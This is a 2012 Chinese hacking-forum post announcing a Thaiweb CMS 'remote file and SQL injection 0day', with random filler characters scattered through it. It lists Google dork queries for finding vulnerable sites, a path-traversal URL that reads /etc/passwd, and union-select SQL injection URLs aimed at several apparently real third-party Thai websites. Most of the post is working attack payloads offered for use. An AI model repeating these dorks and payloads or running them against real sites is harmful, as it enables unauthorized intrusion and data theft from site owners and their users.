找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2526|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:
! T0 H0 e, m1 p  G2 j2 K) O0 Y# b; R1 A% U0 S4 ?0 O' y
intext:powered by Thaiweb. @6 n- p: A3 ~! k8 W9 [  a# l$ [
# A/ K) I# M( j( c
inurl:index.php?page=board.php
: X% g  v; `7 @1 O+ K0 C6 T+ H, N  p. Q1 ?/ t; Y, g$ N
' k6 G9 T+ D2 X

% z5 N% V  q. }8 p0 w* I  F  D利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
! I$ z2 Y  O" D6 {: `3 E0 P  P" j$ Y& I1 C4 l( A
3 r; S" C9 p. Y, N+ a

$ v" [( W1 N0 H- _利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'+ y6 l" ]; p$ A
+ L; n& |- P7 b; {, X) y

% d" R+ e9 h7 U! A6 h( O" Y/ i- ^+ ]6 `; C+ w
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) m) t: t) U* O+ Z. ~9 F2 K; }% T, o1 R
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--. @& J9 W+ }' Z' l3 z8 l3 k

' m5 M0 W- W" }* y$ A$ mhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
0 G% w/ O3 U/ _2 |( U5 u$ F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表